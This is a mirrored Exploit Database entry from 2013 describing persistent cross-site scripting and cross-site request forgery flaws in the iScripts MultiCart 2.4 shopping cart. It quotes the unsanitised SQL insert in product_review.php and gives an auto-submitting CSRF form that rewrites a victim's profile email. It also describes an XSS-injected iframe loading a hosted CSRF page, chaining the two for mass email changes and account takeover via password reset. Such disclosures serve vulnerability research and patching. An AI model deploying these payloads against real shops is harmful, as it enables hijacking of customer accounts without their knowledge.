iScripts MultiCart 2.4 – Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover

• Exploit Database
• 13 阅读

• 作者： Saadi Siddiqui
  日期： 2013-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30357/

• # Exploit Title: iScripts MultiCart <=2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
  # Date : 2013/12/14
  # Exploit Author : Saadat Ullah ， saadi_linux[at]rocketmail[dot]com
  # Software Link: http://www.iscripts.com
  # Author HomePage: http://security-geeks.blogspot.com
  # Tested on: Server : Apache/2.2.15 PHP/5.3.3
  
  # Cross-site Scripting
  
  iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which 
  attacker can manipulate user data via sending him malicious craft url.
  
  XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
  In Product_review.php line 52--- Persistent XSS
  
  mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',
  
  						'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
  						
  $_POST['txtReview'] is inserted without sanitizing.
  
  Exploitation
  
  Goto http://site.tld/product_review.php?pid=[any product id]
  Paste your xss vector and submit.
  
  XSS vector will be executed here
  http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.
  
  # Cross-site request forgery
  <html>
  	 <body onload="javascript:document.forms[0].submit()">
  	 <formname="ex"action="http://localhost/profile.php" method=post >
  	 
  			 
  				<input type=hidden size=30 maxlength=30 name=userid value="5">
  			 
  				<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
  			 
  				<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
  			 
  		 
  				<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
  	 
  				<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
  				<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
  				<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
  				<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
  		
  			<input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
  		<input type=submit name=btnSaveChanges class=button value='Save'> 
  	</form>
  </html>
  
  # XSS+CSRF Mass Email Change /Mass Account Takeover
  
  XSS+CSRF can be used to change mass user email ,after changing the email we can change the password too via
  forget password option and providing email.
  Just inject a CSRF iframe as XSS vector on product_review.php
  E.g
  <iframe src="http://www.site.tld/inject.html"></iframe>
  Inject.html ---> CRSF exploit
  
  So now whenever user browse different products their useremail will be changed automatically.
  
  #Independent Pakistani Security Researcher